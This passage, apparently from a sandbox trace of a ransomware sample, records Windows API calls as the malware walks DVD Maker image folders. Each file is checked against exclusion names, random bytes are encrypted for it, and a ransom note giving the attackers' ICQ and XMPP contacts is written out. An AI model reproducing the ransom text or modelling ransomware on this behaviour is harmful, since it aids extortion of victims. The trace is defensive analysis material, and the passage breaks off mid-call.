[0251.584] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_SelectionSubpicture.png") returned 98 [0251.584] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.584] lstrcmpW 
(lpString1="NavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.584] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.584] lstrlenW (lpString=".testttjffg") returned 11 [0251.584] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.585] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.585] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.585] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.590] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70b5623e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70b5623e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 0 [0251.590] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.591] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\#Decrypt#.txt") 
returned 75 [0251.591] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.592] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.593] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.594] lstrlenA (lpString="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") returned 1368 [0251.594] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.594] CloseHandle (hObject=0x158) returned 1 [0251.594] GetProcessHeap () returned 0x780000 [0251.594] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.594] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fbd8be5, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab41c3c, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9fdc8b88, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Memories", cAlternateFileName="")) returned 1 [0251.596] lstrcmpiW (lpString1="Memories", lpString2="Windows") returned -1 [0251.596] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories") returned 56 [0251.596] lstrcmpW (lpString1="Memories", lpString2=".") returned 1 [0251.596] lstrcmpW (lpString1="Memories", lpString2="..") returned 1 [0251.596] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.596] GetProcessHeap () returned 0x780000 [0251.596] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7dc820 [0251.596] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\*") returned 58 [0251.596] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fbd8be5, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab41c3c, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9fdc8b88, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.598] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.599] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\.") returned 58 [0251.599] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.599] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fbd8be5, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab41c3c, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9fdc8b88, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.599] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.599] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\..") returned 59 [0251.599] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.599] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.599] 
FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x710d74af, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x710d74af, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb08f, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="16_9-frame-background.png", cAlternateFileName="")) returned 1 [0251.599] lstrcmpiW (lpString1="16_9-frame-background.png", lpString2="Windows") returned -1 [0251.599] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png") returned 82 [0251.599] StrStrIW (lpFirst="16_9-frame-background.png", lpSrch=".horseleader") returned 0x0 [0251.599] lstrcmpW (lpString1="16_9-frame-background.png", lpString2="#Decrypt#.txt") returned 1 [0251.599] lstrcmpW (lpString1="16_9-frame-background.png", lpString2="_uninstalling_.png") returned 1 [0251.599] lstrlenW (lpString=".testttjffg") returned 11 [0251.599] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png", lpSrch=".testttjffg") returned 0x0 [0251.599] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.599] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.599] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.600] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x710fd60c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x710fd60c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1bc651, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc32, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="16_9-frame-highlight.png", cAlternateFileName="")) returned 1 [0251.600] lstrcmpiW (lpString1="16_9-frame-highlight.png", lpString2="Windows") returned -1 [0251.600] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png") returned 81 [0251.601] StrStrIW (lpFirst="16_9-frame-highlight.png", lpSrch=".horseleader") returned 0x0 [0251.601] lstrcmpW (lpString1="16_9-frame-highlight.png", lpString2="#Decrypt#.txt") returned 1 [0251.601] lstrcmpW (lpString1="16_9-frame-highlight.png", lpString2="_uninstalling_.png") returned 1 [0251.601] lstrlenW (lpString=".testttjffg") returned 11 [0251.601] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png", lpSrch=".testttjffg") returned 0x0 [0251.601] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.601] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.601] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.601] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71123769, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71123769, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1bc651, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x578, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="16_9-frame-image-mask.png", cAlternateFileName="")) returned 1 [0251.601] lstrcmpiW (lpString1="16_9-frame-image-mask.png", lpString2="Windows") returned -1 [0251.601] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png") returned 82 [0251.601] StrStrIW (lpFirst="16_9-frame-image-mask.png", lpSrch=".horseleader") returned 0x0 [0251.601] lstrcmpW (lpString1="16_9-frame-image-mask.png", lpString2="#Decrypt#.txt") returned 1 [0251.601] lstrcmpW (lpString1="16_9-frame-image-mask.png", lpString2="_uninstalling_.png") returned 1 [0251.601] lstrlenW (lpString=".testttjffg") returned 11 [0251.601] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png", lpSrch=".testttjffg") returned 0x0 [0251.602] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.602] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.602] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png" (normalized: "c:\\program files\\dvd 
maker\\shared\\dvdstyles\\memories\\16_9-frame-image-mask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.602] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x711498c6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x711498c6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1bc651, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8c12, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="16_9-frame-overlay.png", cAlternateFileName="")) returned 1 [0251.602] lstrcmpiW (lpString1="16_9-frame-overlay.png", lpString2="Windows") returned -1 [0251.602] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-overlay.png") returned 79 [0251.602] StrStrIW (lpFirst="16_9-frame-overlay.png", lpSrch=".horseleader") returned 0x0 [0251.602] lstrcmpW (lpString1="16_9-frame-overlay.png", lpString2="#Decrypt#.txt") returned 1 [0251.602] lstrcmpW (lpString1="16_9-frame-overlay.png", lpString2="_uninstalling_.png") returned 1 [0251.602] lstrlenW (lpString=".testttjffg") returned 11 [0251.602] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-overlay.png", lpSrch=".testttjffg") returned 0x0 [0251.603] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.603] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.603] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-overlay.png" 
(normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.603] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71254251, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71254251, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1bc651, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2f993, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="background.png", cAlternateFileName="")) returned 1 [0251.603] lstrcmpiW (lpString1="background.png", lpString2="Windows") returned -1 [0251.603] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png") returned 71 [0251.603] StrStrIW (lpFirst="background.png", lpSrch=".horseleader") returned 0x0 [0251.603] lstrcmpW (lpString1="background.png", lpString2="#Decrypt#.txt") returned 1 [0251.603] lstrcmpW (lpString1="background.png", lpString2="_uninstalling_.png") returned 1 [0251.603] lstrlenW (lpString=".testttjffg") returned 11 [0251.603] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png", lpSrch=".testttjffg") returned 0x0 [0251.603] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.604] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.604] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png" (normalized: "c:\\program 
files\\dvd maker\\shared\\dvdstyles\\memories\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.604] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7116fa23, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7116fa23, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d27ad27, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2a88, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="btn-back-static.png", cAlternateFileName="")) returned 1 [0251.605] lstrcmpiW (lpString1="btn-back-static.png", lpString2="Windows") returned -1 [0251.605] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png") returned 76 [0251.605] StrStrIW (lpFirst="btn-back-static.png", lpSrch=".horseleader") returned 0x0 [0251.605] lstrcmpW (lpString1="btn-back-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.605] lstrcmpW (lpString1="btn-back-static.png", lpString2="_uninstalling_.png") returned 1 [0251.605] lstrlenW (lpString=".testttjffg") returned 11 [0251.605] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png", lpSrch=".testttjffg") returned 0x0 [0251.605] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.605] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.605] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png" (normalized: "c:\\program 
files\\dvd maker\\shared\\dvdstyles\\memories\\btn-back-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.605] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7116fa23, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7116fa23, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d27ad27, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x280e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="btn-next-static.png", cAlternateFileName="")) returned 1 [0251.605] lstrcmpiW (lpString1="btn-next-static.png", lpString2="Windows") returned -1 [0251.605] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-next-static.png") returned 76 [0251.606] StrStrIW (lpFirst="btn-next-static.png", lpSrch=".horseleader") returned 0x0 [0251.606] lstrcmpW (lpString1="btn-next-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.606] lstrcmpW (lpString1="btn-next-static.png", lpString2="_uninstalling_.png") returned 1 [0251.606] lstrlenW (lpString=".testttjffg") returned 11 [0251.606] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-next-static.png", lpSrch=".testttjffg") returned 0x0 [0251.606] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.606] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.606] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-next-static.png" (normalized: 
"c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\btn-next-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.606] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x711bbcdd, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x711bbcdd, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d27ad27, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2808, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="btn-previous-static.png", cAlternateFileName="")) returned 1 [0251.606] lstrcmpiW (lpString1="btn-previous-static.png", lpString2="Windows") returned -1 [0251.606] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-previous-static.png") returned 80 [0251.606] StrStrIW (lpFirst="btn-previous-static.png", lpSrch=".horseleader") returned 0x0 [0251.607] lstrcmpW (lpString1="btn-previous-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.607] lstrcmpW (lpString1="btn-previous-static.png", lpString2="_uninstalling_.png") returned 1 [0251.607] lstrlenW (lpString=".testttjffg") returned 11 [0251.607] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-previous-static.png", lpSrch=".testttjffg") returned 0x0 [0251.607] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.607] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.607] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\Memories\\btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\btn-previous-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.608] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x711bbcdd, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x711bbcdd, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x946, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="button-highlight.png", cAlternateFileName="")) returned 1 [0251.608] lstrcmpiW (lpString1="button-highlight.png", lpString2="Windows") returned -1 [0251.608] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-highlight.png") returned 77 [0251.608] StrStrIW (lpFirst="button-highlight.png", lpSrch=".horseleader") returned 0x0 [0251.608] lstrcmpW (lpString1="button-highlight.png", lpString2="#Decrypt#.txt") returned 1 [0251.608] lstrcmpW (lpString1="button-highlight.png", lpString2="_uninstalling_.png") returned 1 [0251.608] lstrlenW (lpString=".testttjffg") returned 11 [0251.608] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-highlight.png", lpSrch=".testttjffg") returned 0x0 [0251.608] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.608] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, 